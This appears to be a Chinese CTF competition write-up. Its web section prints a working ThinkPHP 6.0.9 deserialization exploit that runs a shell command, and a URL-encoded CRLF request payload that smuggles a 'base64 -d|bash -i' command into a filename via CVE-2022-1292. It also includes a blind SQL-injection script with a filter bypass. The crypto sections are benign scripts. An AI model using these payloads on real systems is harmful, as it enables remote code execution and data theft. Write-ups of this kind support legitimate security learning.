出题人不会出可以不出
Web手变成Crypto手,密码学大胜利
Web ezpop 扫目录发现源码www.zip
,发现反序列化触发点
Thinkphp6.0.9反序列化复现及整合 - 先知社区 (aliyun.com)
网上的exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 <?php namespace think { use think \route \Url ; abstract class Model { private $lazySave ; private $exists ; protected $withEvent ; protected $table ; private $data ; private $force ; public function __construct ( ) { $this ->lazySave = true ; $this ->withEvent = false ; $this ->exists = true ; $this ->table = new Url (); $this ->force = true ; $this ->data = ["1" ]; } } } namespace think \model { use think \Model ; class Pivot extends Model { function __construct ( ) { parent ::__construct (); } } $b = new Pivot (); echo urlencode (serialize ($b )); } namespace think \route { use think \Middleware ; use think \Validate ; class Url { protected $url ; protected $domain ; protected $app ; protected $route ; public function __construct ( ) { $this ->url = 'a:' ; $this ->domain = "<?php system('cat /flag.txt');?>" ; $this ->app = new Middleware (); $this ->route = new Validate (); } } } namespace think { use think \view \driver \Php ; class Validate { public function __construct ( ) { $this ->type['getDomainBind' ] = [new Php (), 'display' ]; } } class Middleware { public function __construct ( ) { $this ->request = "2333" ; } } } namespace think \view \driver { class Php { public function __construct () { } } }
online_crt 下源码,发现openssl,最近有个命令注入的洞CVE-2022-1292
注入点在这
文件名可以从go写的这个重命名的地方修改
要先绕过这两个判断url和host的地方,可以用Python的Proxy
路由进行crlf
整体流程如下:
先POST getcrt
进行获取crt证书
随后利用crlf绕过判断,进行修改文件名
request.form.get
是从post表单中获取值,同时又限制了只能发送get
,因此可以构建以下数据包绕过
c.Request.URL.RawPath
指的是解码前的URL
payload
1 %2F%2561dmin%2Frename%3Foldname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%26newname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%2522%253Becho%2520Payload%253D%257Cbase64%2520%252Dd%257Cbash%2520%252Di%253Becho%2522%20HTTP%2F1%2E1%0AHost%3A%20admin%0AUser%2DAgent%3A%20admin%0AAccept%2DEncoding%3A%20gzip%2C%20deflate%0AAccept%2DLanguage%3A%20zh%2DCN%2Czh%3Bq%3D0%2E9%0AConnection%3A%20close%0A%0A%0A
最后访问createlink
触发
Ezpentest https://ctfking.com/2022/032432393.html
出题人这是拿waf来让我们猜,恶心人吗这是,放了两次hint,直到黑灯了才有解
过滤了~
,因此文章里的payload需要改一下,~0+1+''
改成!0+18446744073709551615+1+''
也可利用整数溢出进行报错注入
直接拿文章里的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import requestsurl='http://xxx/login.php' proxies = { "http" :"http://127.0.0.1:8080/" } flag='' for i in range (1 ,50 ): for ascii in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789^!?$' : temp=ascii if (temp in '^!?$' ): temp="\\\\\\" +temp payload={ 'password' :'xxx' , "username" :f"'||case`password`like'{flag+temp} %'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'" , } response=requests.post(url=url, data=payload,proxies=proxies) if response.status_code==500 : flag+=temp print (flag) break
密码:(挺怪异一段,忘了存了)
账户不是admin,注一下发现是这么个玩意:
然而还是登录不上,不知道为啥了最后时间不够没去找flag是不是在别的表里,绝了
Crypto 签到电台 拿提示
从题中拿到密码本,根据提示写脚本
1 2 3 4 5 6 7 key="2912 3414 5162 6502 4914 3233 4313" .split(" " ) flag="1732 2514 1344 0356 0451 6671 0055" .split(" " ) res="" for i in range (len (key)): for j in range (len (key[i])): res+=str ((int (key[i][j])+int (flag[i][j]))%10 ) print (res)
基于挑战码的双向认证1、2 非预期,root目录权限没配置,可以直接读取flag
基于挑战码的双向认证3 依旧是非预期,root的密码是弱口令toor
,直接su root
ISO9798 先跑验证码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import hashlibimport stringdef sha256 (s ): return hashlib.sha256(str (s).encode('utf-8' )).hexdigest() total_sha256 = 'd0320fe0ec98bde37c5ed7f87d7d2624cccc0d87c247e91ca44f00874f06f2c8' know = 'VN6HjfueM7Uj8q5E' dic = string.digits + string.ascii_letters def findsha256 (know,total_sha256 ): for i in dic: for j in dic: for k in dic: for l in dic: tmp = i+j+k+l+know print (tmp) if sha256(tmp) == total_sha256: print ("success:" + i+j+k+l) exit() findsha256(know,total_sha256)
第二步是输128bit的随机数
随便输满位数,进入第三步
第三步返回了96位得字符串,
观察加密方式,有三项内容,于是尝试三等分,按照题目要求将第二部分和第一部分拼接